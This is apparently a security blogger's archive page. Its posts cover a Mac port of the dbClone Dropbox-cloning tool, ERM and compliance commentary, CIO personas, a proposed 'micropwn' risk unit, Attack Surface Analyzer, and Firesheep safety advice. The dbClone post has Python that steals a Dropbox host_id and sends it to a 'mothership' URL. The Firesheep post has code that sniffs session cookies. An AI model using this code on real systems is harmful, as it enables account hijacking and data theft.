
Category Archives: Information Security

UPDATE: Check out the newer post on additional features.

There has been much ado of late about Dropbox security with one of the most egregious issues being how easy it is to surreptitiously “clone” someone else’s Dropbox by obtaining just one piece of data – the host id – from the Dropbox SQLite config.db.

Moloch built a Windows & Linux impersonation/cloning utility in Python that was/is meant to be used from a USB/external volume. The utility can save the cloned host id to a local file and also has the capability to use a simple HTTP GET request to log data to a “mothership” web site.
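To make the exposure concrete, here’s a minimal Python sketch of what a dbClone-style utility does – not Moloch’s actual script – assuming the 2011-era config.db layout (a config table of key/value rows holding host_id); the paths, log filename and GET parameter name are placeholders:

[code]
# Minimal sketch of a dbClone-style grab (not Moloch's actual script).
# Assumes the 2011-era schema: a "config" table of key/value rows
# holding "host_id". Paths, filenames and the URL are placeholders.
import os
import sqlite3
from urllib.parse import urlencode
from urllib.request import urlopen

DB_PATH = os.path.expanduser("~/.dropbox/config.db")

conn = sqlite3.connect(DB_PATH)
row = conn.execute("SELECT value FROM config WHERE key = 'host_id'").fetchone()
conn.close()

if row:
    host_id = row[0].decode() if isinstance(row[0], bytes) else row[0]
    # Log locally, as the utility's LogFilename option does...
    with open("GroceryList.txt", "a") as log:
        log.write(host_id + "\n")
    # ...and/or phone home with a simple HTTP GET (parameter name is a guess).
    urlopen("http://somesite.domain/mothership.php?" + urlencode({"host_id": host_id}))
[/code]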

Since many Dropbox users use OS X (including me), I didn’t want them to feel left out or smugly more secure. So, I set about creating a native version of the utility.

This release is not as feature-rich as Moloch’s Python script but it won’t take much more effort to crank out a version that duplicates all of the functionality. “Release early. Release often.” as the kids these days are wont to say.

You can find the source at its github repository. When building it or just downloading & running the executable (see below), you should heed the repo’s README and take care to change the following items in the application’s Info.plist property list:

  • MothershipURL – this is the URL of the remote host you want to store the cloned info to. It defaults to somesite.domain/mothership.php to avoid accidentally sending your own Dropbox data to a remote host. PLEASE NOTE that you will need to get the mothership.php script from the original Windows/Linux code distribution as I have not asked for permission to distribute it here. You can grab the original dbClone.rar directly from here: dl.dropbox.com/u/341940/dbClone.rar (I love the irony of it being hosted on Dropbox itself).

    ALSO NOTE that there’s no need to modify the application’s property list if you don’t mind typing in a URL each run. I eventually plan on making this a separate property list file that allows for multiple URLs so you can select it from a drop-down (and still type a new one if you like).

  • LogFilename – just include the filename you want to use when storing the cloned info locally if you do not like the default (it’s the same as Moloch’s – "GroceryList.txt"). It defaults to the top-level of the mounted volume (the original Linux & Windows dbClone was meant to be run from a USB/external volume) or "~/" if running it on your boot drive.

You can use the property list editor(s) that come with Apple’s Developer Tools or use vim, TextEdit, TextWrangler (or your favorite text editor) and modify these lines appropriately:

[code]
<key>LogFilename</key>
<string>GroceryList.txt</string>
<key>MothershipURL</key>
<string>http://somesite.domain/mothership.php</string>
[/code]
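
If you’d rather script those edits than open an editor, Python’s standard-library plistlib can rewrite the keys. A sketch, assuming a bundle path (the app/bundle name here is hypothetical):

[code]
# Sketch: scripted edit of the app's Info.plist via Python's plistlib.
# The bundle path is an assumption -- point it at your build or the
# unzipped app.
import plistlib

PLIST = "dbClone.app/Contents/Info.plist"  # hypothetical bundle name

with open(PLIST, "rb") as f:
    info = plistlib.load(f)

info["MothershipURL"] = "http://your.host/mothership.php"
info["LogFilename"] = "GroceryList.txt"

with open(PLIST, "wb") as f:
    plistlib.dump(info, f)
[/code]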

If you do use the “backup” option, the current naming scheme is "backup-config.db" and it’s important to note that the program will not attempt to overwrite the file. I may change that behaviour in an upcoming release.
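
In other words, the backup logic behaves roughly like this (a sketch; the source path is an assumption):

[code]
# Rough sketch of the no-overwrite backup behaviour described above.
import os
import shutil

src = os.path.expanduser("~/.dropbox/config.db")   # assumed location
dest = "backup-config.db"

if not os.path.exists(dest):
    shutil.copy2(src, dest)
else:
    print("refusing to overwrite existing " + dest)
[/code]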

I tested the build on OS X 10.6.7 but the Xcode project is set to build for compatibility with 10.5.x or 10.6.x. Feedback on behaviour on other systems would be most welcome.

If you just want the executable, grab the zip’d app and give it a go.

Any and all feedback is welcome (via github or in the comments).

NOTE: Had to modify the latimes URL in the post due to a notice from Wordfence/Google.

I was reviewing the – er – highlights? – from the ninth ERM Symposium in Chicago over at Riskviews this morning and was intrigued by some of the parallels to the current situation in enterprise security risk management (the ERM symposium seemed to be laser-focused on financial risk, which is kinda sad since ERM should make security/IT compliance risk a first class citizen). Not all topics had a 1:1 parallel, but there were some interesting ones:

  • Compliance culture of risk management in banks contributed to the crisis :: While not necessarily at crisis levels yet, the compliance culture that is infecting information security is headed toward this same fate. Relying on semi-competent auditors to wade through volumes of compensating controls and point-in-time reviews to deliver ✓’s in the right boxes is not a recipe for a solid security program that will help mitigate and respond effectively to emerging threats.
  • Banks were supposed to have been sophisticated enough to control their risks :: I’ll focus on medium-to-large enterprises for this comparison, but I’m fairly confident that this is a prevalent attitude regarding information security in corporations across the globe (“We manage information risk well”). Budgets seem to be focused on three fundamental areas that non-security-folk can conceptually grasp: firewalls (stop), traditional anti-virus (block) and endpoint disk encryption (scramble). By now, with a decade of OWASP failures [PDF, pg 28], a multi-year debate about anti-virus efficacy and ample proof that vendors suck at building secure software as evidence, you’d think we’d be focusing on identifying the areas of greatest risk and designing & following roadmaps to mitigate them.

    This may be more of a failure on our part to effectively communicate the issues in a way that decision makers can understand. While not as bad as the outright lying committed by those who helped bake the financial meltdown cake, it is important to call out since I believe senior management and company boards would Do The Right Thing™ if we effectively communicated what that Right Thing is.

  • Regulators need to keep up with innovation and excessive leverage from innovation. :: The spirit of this is warning that financial regulators need to keep a sharp eye out for the tricky ways institutions come up with to get around regulations (that’s my concise summary of “innovation”). Think “residential mortgage-backed securities”. The “excessive leverage” bit is consumers borrowing way too much money for over-priced houses.

    I’m not going to try to make a raw parallel, but just focus on the first part: Regulators need to keep up with innovation. The bad guys are getting more sophisticated and clever all the time and keep up with hot trends faster than we can defend against them…due in part to our wasted time testing controls and responding to low-grade audit findings. When even the SOX compliant security giants can fall hard, you know there’s a fundamental problem in how we are managing information security risk. Regulators & legislators need to stop ( http:// articles. latimes. com /2011/feb/11/business/la-fi-0211-privacy-20110211 ) jerking knees and partner with the best and the brightest in our field to develop new approaches for prescribing and validating security programs.

  • ERM is not an EASY button from Staples :: I’m *so* using that quote in an infosec context this week
  • Many banks and insurers should be failing the use test for ERM regulation to be effective. :: More firms need to fail SOX and PCI and [insert devastating regulation acronym here] checks, or SOX & PCI requirements need to change so that we see more failing. Pick one SOX and PCI compliant company at random and I’ll bet they have at least one exploitable Internet-based exposure or that custom-crafted malware can get through. If we start making real, effective, and sane regulations, we’ll start contributing to the betterment of information security in organizations.
  • Stress testing is becoming a major tool for regulators. :: What if regulators did actual stress testing of our security controls versus relying on point-in-time checks? I know that the stress tests for banks end up being a paper exercise, but even those exercises have managed to find problems. Come in, pick three modern exploit vectors and walk through how company defenses would hold up.
  • Regulators need to be able to pay competitive market salaries :: We need smarter rule-makers and examiners. There are good people doing good work in this space, just not enough of them.
  • Difficult for risk managers to operate under multiple constraints of multiple regulators, accounting systems. :: Just domestically, 42 states with separate privacy regulations, SOX for public companies, PCI compliance for those who process credit cards and independent infosec auditing standards across any third-party one needs to do business with make it almost impossible to stop spinning around low-level findings and focus on protecting critical information assets. We need to get to a small number of solid standards that we can effectively understand and design solutions to meet.
  • Nice tree/forest story: Small trees take resources from the forest. Large trees shade smaller trees making it harder for them to get sunlight. Old trees die and fall crashing through the forest taking out smaller trees. :: This made me think of the rampant consolidation of the security tech industry. Savvy, nimble & competent boutique vendors are being swallowed by giants. The smart people leave when they can and the solutions are diluted and become part of a leftover stew of offerings that don’t quite fit together well and are not nearly as effective as they once were.
  • Things that people say will never go wrong will go wrong. :: “We’ll never have a SQL injection. Our mobile devices will never get malware on them. Those users will never figure out how to do [that thing], why should we spend time and resources building it correctly?”
  • Compliance should be the easy part of ERM, not the whole thing :: So. True.
  • Asking dumb questions should be seen as good for firm. 10th dumb question might reveal something that no one else saw. :: This needs to be a requirement at everyone’s next architecture meeting or project initiation meeting. At the very least, do something similar before you let someone open up a firewall port.
  • There is a lack of imagination of adverse events. US has cultural optimism. Culture is risk seeking. :: Can be easily seen in our headstrong rush into consumerizing IT. I find that architects, engineers and application developers tend to see 1-2 “security moves” out. We need to do a better job training them to play Go or Chess in the enterprise.
  • People understand and prefer principles based regulation. But when trust is gone everything moves towards rules. :: If firms had been Doing The Right Thing™ in information security when they had the chance, we wouldn’t be in the state we are in now. I can’t see us getting [back] to principles-based regulation any time soon.
  • Supervisors need to learn to say no :: How many firewall port opens, disk-encryption exclusions, anti-virus disables and other policy exceptions have you processed just this past week? How many defenses have you had to give up during an architecture battle? Non-infosec leaders absolutely need to start learning how to say “no” when their best-and-brightest want to do the wrong thing.
  • Caveat Emptor :: Don’t believe your infosec vendors
  • A risk metric that makes you more effective makes you special. :: We have risk metrics? Seriously, tho, if we can measure and report risk effectively, our infosec programs will get better.

I may have missed some or got some wrong. I’d be interested in any similarities or differences others saw in the list, or if you think that I’m overly cynical about the state of affairs in infosec risk.

This morning, @joshcorman linked to an article in the Harvard Business Review’s “The Conversation” blog that put forth the author’s view of The Four Personas of the Next-Generation CIO. The term persona is very Jungian and literally refers to “masks worn by a mime”. According to Jung, the persona “enables an individual to interrelate with the surrounding environment by reflecting the role in life that the individual is playing. In this way one can arrive at a compromise between one’s innate psychological constitution and society.”1

So, the gist of the article is that there are four critical roles that the new CIO must play to successfully interrelate with and orchestrate the IT environment within their business. I believe this provides a context to dovetail information security & compliance components within the personas (since none of them are overtly infosec or compliance), essentially facilitating a compromise between the innate desire to “do the right thing” – i.e. compliance/security – (which I do believe most CIOs possess) and the initiatives that stem from these personas which appear to be – on the surface – in direct conflict. As Josh pointed out, this gives us – the professionals that support our CIOs – an opportunity to help rather than obstruct. Let’s take a look at each of the four personas and what parts of information security & compliance are critical to the real success of each role.

Chief “Infrastructure” Officer

Key points:

  • cost reduction
  • accounts for 70% of IT budget
  • “lights on” focus
  • needs to maintain legacy environments while trying to integrate disruptive technologies
  • internal-facing

This area is where most IT information security & compliance dollars are spent; the spending typically involves personnel & legacy security technology costs (e.g. firewalls and traditional anti-virus) and contributes to the overall budget impact of verifying the efficacy of established controls (i.e. audits).

The best way to help this CIO persona is to ensure that your organization spends only what it needs to safeguard the information at risk. Regular, repeated risk assessments facilitate this by prioritizing the systems, networks and applications that require the most protection and enabling the design & implementation of automated controls in those environments.

Government and industry regulations, third party business partner mandates and internal audit requirements are all factors in the risk assessment process, so there should be no surprises when the auditors come around. Furthermore, this risk assessment process will ultimately ensure that the controls are operating as efficiently as your organization can support with as little resource consumption as possible. It will also help shed light on controls that are missing or ineffective (both the first time through and as you perform regular validations). If you don’t believe compliance has a budget impact, take a look at the True Cost of Compliance report by Ponemon Institute & Tripwire, Inc.

Solid and well-integrated risk assessment methodologies will speed up infrastructure and application deployment times as there will be no last-minute security surprises that either hold up a rollout or cause compliance problems at a later date due to not being properly considered. By driving manual control costs to automation, focusing on the right risks and keeping the compliance folks satisfied, you will provide your CIO the tools she needs to keep the lights on and the budget required to correctly integrate new technologies.

Chief “Integration” Officer

Key points:

  • connect internal & external ecosystems
  • accounts for 10% of IT budget
  • connects disparate processes, data, systems, etc.
  • M&A-centric
  • external- & internal-facing

Of all the areas, I believe this one presents the best opportunity for our profession to shine and deliver the most value to IT & the business. The key is to weed out all the “Doctor No’s” in your organization. The “Doctor No” basically says “No” to every “can we do ‘x’?” question, which is at the heart of all the activities this CIO persona needs to perform. For example:

Senior Business Analyst: “Can we connect these systems to this cloud service?”
Security Analyst: “NO! Of course not, you fool!”

Moving from “No” to enabling the business to operate in a secure fashion is an extension of the risk management practices that make the Infrastructure persona successful and needs to be combined with a strong Security Architecture program. For every connection, identify the non-negotiable compliance requirements as factors in a thoughtful risk assessment process. Communicate the “must-haves” and the risk finding to the business & IT stakeholders and enable them to make an informed decision with innovative and/or time-tested architecture options.

Business owners are used to taking risks all the time (or just going out of business if they fail to take on risks regularly), and security/compliance risks are no different, except that most senior executives are far more familiar with traditional risk management activities and need your help integrating security & compliance risk understanding into their existing knowledge-base.

Natural by-products of your support in this area will be:

  • an understanding of the benefits of a data classification system (so your CIO will know what she really does need to protect),
  • an appreciation for the development of lightweight, repeatable process during the early stages of analysis & integration design, and
  • a comprehension of the inherent, legitimate risks in the environment

which will all support more efficient acquisition and integration endeavours (and I can’t think of one CIO who would be against increased efficiency in those areas).

Chief “Intelligence” Officer

Key points:

  • actionable insight
  • accounts for 10% of IT budget
  • improves business-user access to information
  • right data to right person at right time on right interface
  • internal-facing

This area has a similar reliance on a robust data classification program and can be more easily facilitated via a robust identity and access management program. To make your CIO successful, you will need to help her work with the business to identify the information assets to be incorporated into each business intelligence (BI) initiative and ensure they are classified by their owners/stakeholders. There’s a good chance you’ll need to re-think your access control infrastructure architecture as well since you will be facing users armed with iPads, Macs and modern web client technologies that you’ve managed to avoid up until now.

To ensure these BI activities do not just add to audit findings, it will be important to incorporate regular access rights reviews into the mix, since authentication and authorization will be the most robust control points. Perhaps this will also be a way to start the discussion on moving from archaic username and password credentials to multi-factor authentication, adaptive authentication or even a full-on migration to PKI. There will be no better time than now to show how these solutions enable better access control and provide even more options in the general application space.

Finally, with all of this information flying through your network this may be the most opportune time to research what DLP solutions are available and how they might be deployed (one size and even one solution does not fit all) to ensure the business is retaining as much control over the data as it wants (risk management always seems to sneak its way in).

Remember, the goal is to facilitate the business operations with as little disruption as possible. Getting in up-front with your ideas and solutions will make your CIO much more effective in orchestrating successful BI programs and projects.

Chief “Innovation” Officer

Key points:

  • pilots disruptive technologies
  • accounts for 10% of IT budget
  • move fast; fail fast; move on
  • external-facing

I like shiny objects as much as the next tech-SQUIRREL!-and many CIOs do as well. Who wouldn’t want to arm their workforce with iPads connected to VDI sessions in the cloud (shameless SEO-inspired sentence)? Seriously, though, the modern CIO must regularly push IT & business users and management out of their comfort zones to avoid having their whole shop turn into a data center maze of twisty legacy deployments. Even if the mainframe is still king in many large shops, getting that data into the hands of consumers wielding iOS and Android devices will be crucial to the ongoing success of each enterprise (and, that’s just today).

Moving beyond traditional development models and languages and embracing faster, lighter and domain-specific tools is also part of the equation. Rapid code updates across far more platforms than you are used to will eventually be the norm. And deployment models that involve traditional systems, internally dynamically provisioned application spaces and external content and hosting providers will almost be a necessity for business to succeed.

You must be prepared to have your organization adapt with these changing models. Make sure your staff is part of initiatives like the Cloud Security Alliance, OWASP and Rugged. Keep up with disruptive innovators and embrace the challenge of working with these groups instead of fighting against them.

You will need to help your CIO bake security and compliance checkpoints all throughout the exploratory and development phases of these risky endeavours. Identifying compliance pitfalls will be paramount as the regulatory bodies and auditors are even less apt to embrace change than your security teams are, never mind the monumental and drawn-out tasks of making any changes to established regulatory requirements. Working to help these efforts succeed is great, but you also need to take care to avoid being the reason they fail (especially if that’s not due solely to a compliance problem).

I believe this new model of modern CIO will be very willing to work with an information security/risk/compliance group that exhibits even some of the qualities listed above. It won’t be easy (hey, it isn’t now) but it will give you the most opportunity to be successful in your program(s) and be one of the most critical components in enabling your CIO to respond to ever changing business needs and ventures.

NOTE: This is a re-post from a topic I started on the SecurityMetrics & SIRA mailing lists. Wanted to broaden the discussion to anyone not on those (and, why aren’t you on them?)

I had not heard the term micromort prior to listening to David Spiegelhalter’s Do Lecture and the concept of it really stuck in my (albeit thick) head all week.

I didn’t grab the paper yet, but the abstract for “Microrisks for Medical Decision Analysis” seems to extrapolate directly to the risks we face in infosec:

“Many would agree on the need to inform patients about the risks of medical conditions or treatments and to consider those risks in making medical decisions. The question is how to describe the risks and how to balance them with other factors in arriving at a decision. In this article, we present the thesis that part of the answer lies in defining an appropriate scale for risks that are often quite small. We propose that a convenient unit in which to measure most medical risks is the microprobability, a probability of 1 in 1 million. When the risk consequence is death, we can define a micromort as one microprobability of death. Medical risks can be placed in perspective by noting that we live in a society where people face about 270 micromorts per year from interactions with motor vehicles.

Continuing risks or hazards, such as are posed by following unhealthful practices or by the side-effects of drugs, can be described in the same micromort framework. If the consequence is not death, but some other serious consequence like blindness or amputation, the microrisk structure can be used to characterize the probability of disability.

Once the risks are described in the microrisk form, they can be evaluated in terms of the patient’s willingness-to-pay to avoid them. The suggested procedure is illustrated in the case of a woman facing a cranial arteriogram of a suspected arterio-venous malformation. Generic curves allow such analyses to be performed approximately in terms of the patient’s sex, age, and economic situation. More detailed analyses can be performed if desired.

Microrisk analysis is based on the proposition that precision in language permits the soundness of thought that produces clarity of action and peace of mind.”

When my CC is handy and I feel like giving up some privacy I’ll grab the whole paper, but the correlations seem pretty clear from just that bit.

I must have missed Schneier’s blog post about it earlier this month where he links to understandinguncertainty.org/micromorts which links to plus.maths.org/content/os/issue55/features/risk/index (apologies for the link leapfrogging, but it provides background context that I did not have prior).

At a risk to my credibility, I’ll add another link to a Wikipedia article that lists some actual micromorts and include a small sample here:

Risks that increase the annual death risk by one micromort, and their associated cause of death:

  • smoking 1.4 cigarettes (cancer, heart disease)
  • drinking 0.5 liter of wine (cirrhosis of the liver)
  • spending 1 hour in a coal mine (black lung disease)
  • spending 3 hours in a coal mine (accident)
  • living 2 days in New York or Boston (air pollution)

I asked on Twitter if anyone thought we had an equivalent – a “micropwn“, say – for our discipline. Do we have enough high level data to produce a generic micropwn for something like:

  • 1 micropwn for every 3 consecutive days of missed DAT updates
  • 1 micropwn for every 10 Windows desktops with users with local Administrator privileges
  • 1 micropwn for every 5 consecutive days of missed IDS/IDP signature updates

Just like with the medical side of things, the micropwn calculation can be increased depending on the level of detail. For example (these are all made up for medicine):

  • 1 micromort for smoking 0.5 cigarettes if you are an overweight man in his 50’s
  • 1 micromort for smoking 0.25 cigarettes if you are an overweight man in his 50’s with a family genetic history of lung cancer

(again, I don’t have the paper, but the abstract seems to suggest this is how medical micromorts work)

Similarly, the micropwn calculation could get more granular by factoring in type of industry, geographic location, breach history, etc.

Also, a micropwn (just like a micromort) doesn’t necessarily mean a “catastrophic” breach (I dislike that word, as I think of it as a broad term when most folks associate it directly with sensitive record loss). It could simply mean a successful malware infection, in my view.

So, to further refine the question I originally posed on Twitter: Do we have enough broad data to provide input for micropwn calculations and can we define a starter-list of micropwns that would prove valuable in helping articulate risk within and outside our discipline?
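
To make the idea concrete, here’s a toy micropwn calculator using the made-up example rates from above – none of these numbers are real measurements, they just show how such a scale would compose:

[code]
# Toy micropwn calculator built on the made-up example rates above;
# none of these numbers are real measurements.
RATES = {
    "missed_dat_update_days": 1 / 3,   # 1 micropwn per 3 consecutive days
    "local_admin_desktops":   1 / 10,  # 1 micropwn per 10 desktops
    "missed_ids_sig_days":    1 / 5,   # 1 micropwn per 5 consecutive days
}

def micropwns(exposures):
    """Sum exposure; 1 micropwn = a 1-in-1,000,000 chance of compromise."""
    return sum(RATES[k] * v for k, v in exposures.items())

print(micropwns({
    "missed_dat_update_days": 6,   # -> 2 micropwns
    "local_admin_desktops": 50,    # -> 5 micropwns
    "missed_ids_sig_days": 10,     # -> 2 micropwns
}))  # 9.0
[/code]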

If you’re preparing to install Windows 7 or Windows Server 2008 R2 Service Pack 1, now would be a good time to give Microsoft’s Attack Surface Analyzer a spin. ASA takes a baseline snapshot of your system state and then lets you take another snapshot after any configuration change or product installation and displays the changes to a number of key elements of the Windows attack surface, including analysis of changed or newly added files, registry keys, services, ActiveX Controls, listening ports, access control lists and other parameters.
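
The baseline-then-diff idea itself is simple; here’s a toy Python illustration of the general approach (this is not ASA or its report format):

[code]
# Toy illustration of the baseline/diff approach ASA uses (not ASA
# itself): snapshot some attack-surface facts, snapshot again after a
# change, and report what appeared or disappeared.
import json

def diff(baseline, current):
    added   = {k: sorted(set(current[k]) - set(baseline.get(k, [])))
               for k in current}
    removed = {k: sorted(set(baseline.get(k, [])) - set(current[k]))
               for k in current}
    return {"added": added, "removed": removed}

baseline = {"listening_ports": [135, 445], "services": ["Spooler"]}
current  = {"listening_ports": [135, 445, 3389],
            "services": ["Spooler", "TermService"]}

print(json.dumps(diff(baseline, current), indent=2))
[/code]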

Ideally, you’d take your baseline after a fresh install of your workstation or server from known, good media/images and after your own base configuration changes.

This would also be a good thing to do when building your base VM images so you can then validate their state as you duplicate and modify VDIs.

The installation of a Service Pack is a pretty radical change to your environment. If you run ASA prior to the SP install you can see if there are any significant changes to your system’s security profile after the bundle of patches and hotfixes are put down. You could also use the SP1 event to baseline post-install, provided you’ve done as thorough of a malware & rootkit sweep as can be done (you still cannot truly trust the results).

It may take some discipline to run ASA regularly on your personal systems every time you update software or drivers. IT shops should have an easier time scripting ASA during system deployments as well as application code updates. In either scenario, this free tool from Microsoft should help make you a more informed user and also aid you in building and maintaining more secure systems.

See also: MSDN SDLC blog post on the new Attack Surface Analyzer

By now, many non-IT and non-Security folk have heard of Firesheep, a tool written by @codebutler which allows anyone using Firefox on unprotected networks to capture and hijack active sessions to popular social media sites (and other web sites). The sidebar/extension puts an attractive and easy-to-understand GUI over a process that “real” security people have been using for as long as there have been HTTP-based sessions.
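
There’s no magic under the hood: on an open network, session cookies sent over plain HTTP are readable by anyone in radio range. A toy sketch of the capture step Firesheep automates, using scapy (requires root privileges; the interface name is an assumption):

[code]
# Toy sketch of the capture step Firesheep automates: watch plain HTTP
# and print any session cookies seen. Needs root; "en1" (an OS X Wi-Fi
# interface name) is an assumption -- adjust for your system.
from scapy.all import Raw, sniff

def show_cookies(pkt):
    if pkt.haslayer(Raw):
        payload = bytes(pkt[Raw]).decode("latin-1", errors="replace")
        for line in payload.split("\r\n"):
            if line.lower().startswith("cookie:"):
                print(line)  # replaying this header hijacks the session

sniff(iface="en1", filter="tcp port 80", prn=show_cookies, store=False)
[/code]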

I’ve been using Firesheep quite a bit in non-echo-chamber demos to help illustrate some of the core issues facing enterprises and individual users. A big question that comes out of each demo is “what can I do to safeguard my access to Facebook?”. I provide quick guidance on-the-spot to interested individuals and wanted to share what I communicate to them here both to help a broader audience and get feedback on other steps users can take to safeguard their connections.

General Guidance

The first action I tell users to take is an anti-action: if at all possible, never use free/unsecured Wi-Fi connections. While there are ways of grabbing sessions and other data on wired or secure Wi-Fi networks, the means to do so are beyond the capabilities of most Firesheep users. The danger is still present and you should always consider how much you trust the network you are on when accessing anything on the Internet, but the risk is greatly diminished.

If users are unable or unwilling to follow that first action (and even if they do avoid insecure networks), I then instruct them to ensure that all services they access always use https (SSL/TLS), which encrypts the communication and prevents tools like Firesheep from working. It still – much like the first action – doesn’t stop determined & skilled attackers.

I then caution users on smartphones and tablets to also make sure any applications they use also communicate over SSL. This is far too easy to overlook and can leak data just as easily as a web browser. Tablet & smartphone users can also switch to only using 3G connections to make it that much more difficult for others to eavesdrop.

Finally, I suggest using a virtual private networking (VPN) service such as PureVPN to secure all their connections – not just browser sessions – on public networks (secured or otherwise). SSL/TLS connections are potentially susceptible to what is called a man-in-the-middle (MITM) attack [SANS Reading Room (PDF)] and one way to mitigate that threat is to use a VPN to secure all network communication using a more robust/holistic solution. PureVPN (and other, similar good services) are not free, but $5.00-10.00USD per month is not much to pay for personal data security on-the-go.

The Elephant In The Room

For some reason, even with that general guidance, the whole concept of someone hijacking their Facebook account really scares folks, and many end up asking specific questions about ensuring their Facebook access is protected. This usually involves walking them through how to check to see if SSL is enabled by Facebook’s service and also how to monitor access to their Facebook account.

Unsurprisingly, Facebook does not make setting SSL as a default an easy task. It’s unintuitively not under any “privacy” settings. Instead, you need to navigate down to account settings and poke around to get to the right areas. The screen captures below show the navigation sequence. You’ll notice that this account does not have security enabled since it’s the one I use for demos (I do not have a personal Facebook account).

Getting to Facebook Account Settings

Location of Facebook Account Security Settings

Facebook SSL Settings

You’ll also notice that you can have Facebook send you an e-mail when there is an access to your account from an unknown device and also review recent activity on your account. This gives you the ability to be in control as much or as little as you desire.

Homeward Bound

I usually close with guidance on securing your home Wi-Fi network. Many users still have an aging 802.11b/g router that barely does wired-equivalent-privacy (WEP) security. Even newer Wi-Fi equipment with Wi-Fi Protected Access (WPA/WPA2) may not be enough, as you or someone else in your house most likely hand out the access password to any guest you allow in the residence. Any malware on their systems now has the potential to infect other systems on your network, and you have also given the keys to your local security to someone you may not fully trust. Many of the newest Wi-Fi access points – such as Apple AirPort Extremes and Netgear N[3|6]00s – provide the ability to set up both a protected internal network and as open a guest network as you want. I still suggest ensuring that the guest network be secured as you may be liable for any actions taken from your network (protected or otherwise).

Highway Safety

Being safe[r] on the Internet is much like being safe[r] when driving a car. You need to make sure the fluids are at the right levels, that the tire pressure is sufficient for the driving conditions and that you wear your seatbelt before leaving the driveway. If you don’t regularly perform those tasks you run the risk of significant problems out on the road. You need to get in the habit of doing similar checks when navigating in potentially dangerous network territory as well. It doesn’t help that Facebook cares not a whit about your privacy or security and will seemingly randomly change your settings if it benefits them (or if they are just their usual incompetent selves). Want proof? You have to be diligent in the maintenance of all Internet security settings to ensure your consistent, personal online safety.
